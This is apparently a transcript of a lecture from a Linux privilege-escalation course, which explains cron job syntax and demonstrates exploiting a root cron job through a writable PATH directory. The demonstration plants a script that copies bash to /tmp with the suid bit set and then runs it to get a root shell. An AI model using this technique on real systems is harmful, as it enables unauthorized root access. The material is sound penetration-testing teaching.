Linux Privilege Escalation
The course is part of this learning path
This course explores how to carry out privilege escalation on Linux machines. We look at enumeration, kernel exploits, sudo list, suid, crontab, and much more!
Hi. Within this lecture, we're going to deep dive into the cron jobs that we have actually covered before. In Bandit we have seen a lot of cron jobs and also exploited them in order to gain access to the next level or in order to escalate our privilege. So, that's exactly what we're going to do within these lectures. But also we're going to deep dive into the cron jobs now so that we can understand the theory in a better way so that you can use it in your own good for upcoming CTS or your penetration test during your career. So, let me locate the cron.d over here because I cannot seem to find the etc/cron.d as you can see. So, I have a cron.d over there. Like if I try to cut this, it says that this is a directory. So, let me ls into that and see what we have over there. And apparently there is nothing over there. Let me run ls -la. And here you go, there's nothing over here, but just a placeholder file which is hidden. And I don't think we have anything in the cron.d. But this is not the only thing that we should look for. We also have to look for crontab.
So, if you cat /etc/crontab, you can see the cron jobs that resides in your system as well and you will get a more detailed look like this. And remember what a cron job is. So, it's a service that runs in background and it's scheduled. So, we can actually make it run in anytime we want. And over here we see the shell and the path it uses. So, let's see what else we have here. As you can see, we have a lot of commands over there and these are individual cron jobs. So, we're going to talk about what these stars mean. And over here we can see the command that it runs. So, over here we actually see some cd command and we can see the etc cron.daily, cron.weekly, cron.monthly. So, it doesn't mean that it necessarily has to have this names over here like daily, weekly, monthly, we can actually see where we actually run this or when we actually run this and we're going to deep dive into that. And over here we see some overwrite.sh and also the compress that sh over here. So, next thing we can do, maybe we can try to just see what this overwrite.sh does. So, I'm going to cat this and see if we can actually see this. It says that no such file are directory and it belongs to root. And as you can see if we run ls -la we cannot actually see it. So, it isn't really there. So, maybe it's something in the pad like maybe it's under the user local or user local bin. We are in the home user folder right now. So, it doesn't mean necessarily that it should be in the home user directory, so maybe it's in somewhere else in the path. But in this case we can actually see the whole path over here, so /usr/local/bin/compress.sh.
So, I can just get that and get to see what happens inside of it. As you can see, this file really exists. So, there is nothing wrong over here, but I believe the overwrite sh doesn't exist or it exists in some other folder rather than home user. So, this maybe a path for us to go like lead that we can follow over here because it will be looked in the home user folder first. So, if we create overwrite.sh file in the home user folder, then it will be executed as root over here. And we can understand that it will be executed as a cron job and maybe we should try to understand then it's going to be executed so that we can write a script to become root and we can just write a reverse shell or something like that in order to become root by using this lead. So, it's a good practice for us. But again, there are a lot of other information over here that we didn't cover and we should cover that in order to understand how cron jobs work. So, over here we see a lot of stars and they actually indicate then this is going to be executed or in which period this is going to be executed, okay? Is it daily, is it weekly is it monthly. So, we have a lot of stars over here. So, what do all of those things mean? We have to understand how to read these columns over here. I have to read this like a table. So, for the first column we have minute and the second one is the hour, so h stands for hour. So, this is day of month, day of month, so this is the month itself and this one is day of week. So, these numbers indicate when it's going to be executed. So, if we see stars like these, it means every minute. And if we see a specific number over here, it indicates the minute, for example in this case 17 minutes. So, we're going to just deep dive into this so that you can understand it in a better way. So, let me show you a very quick way to do that. I'm just going to search for crontab guru, crontab.guru. So, this is a website. And this is not the only website that you can see this, but this is a very good one. So, if you cannot make it run, you can just search for other websites here as well, but let me show you what I mean. If you just write the stars over here, or if you write the numbers over here, it will just give you what it means. So, if you see five stars, it means at every minute. So, overwrite sh and the compress.sh will get executed every minute. So, if we write 17 here, for example, it will be executed at minute 17, so every 17 minutes it will be executed.
So, if we write 70 at 25 over here and six for the next step, it means that it will get executed every day at 6 o'clock, 25 past at 6 o'clock. So, let's try the other ones. Of course, we have every script executed into root over here. So, this will give us some clues. So, this could be 47 and let's see 47, six and the last one is seven. So, let's see. At 6:47 on Sundays. So, this is again a very weird cronjob, but this is how it gets executed. So, it gets executed every week and it gets executed exactly at 6:47 at Sundays. So, if we just go over here and make it into 52 and one and star, so 6:52 on day of month 1st. So, this is how you understand when it's going to be executed. This is very important because maybe you can find a very good vulnerability over here, maybe you can just run a script and it will be executed as root, but if it's not every minute or if it's not every day, maybe you will have to wait for a month in order to get that root shell and it's not very practical. So, in this case we know that overwrite.sh and the compress.sh will get executed like every minute. So, if we can overwrite them, then it will be great because we will just wait for a minute and we can get the shell back.
So again, this is the crontab so don't forget to go for the cat.c crontab when you try to find the, locate the cron jobs in your pentest. So, what I'm going to do, of course I'm going to create and overwrite sh, I'm going to echo cp /bin/bash to /tmp/bash and I put a semicolon over here. I'm just going to give an suid to /tmp/bash over there since it's going to be executed as root, it will be possible. And then I'm going to just put this into /home/user/overwrite.sh. So, far so good. So, we have done this before, but I'm going to also make it executable since I created that file as a user, I can just make it executable as user as well. So, great. Now since I put this in the home user folder and since I know that home user is the first thing that it should be looking in the path, then I can just wait for a minute and become root. Because it will be executed every minute. So, now it exists over here. So, whatever we can do over here, what we can do right now is just to just go for the /tmp/bash like this and if it got executed then we're going to get the root. So, make sure you put the -p over here like we have done before and hit 'Enter' or just wait a minute and hit 'Enter' to see if you can become root because if it got executed then we will spawn this shell. So, let me run ls -la to tmp bash or tmp over here. We see the bash. Here we go we see the bash. It got copied over here. That's how we can actually understand if it got executed or not. So, if I run this, here you go, I got the bash and if I run whoami, Iamroot as usual. Great, so let's stop here and continue within the next lecture.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.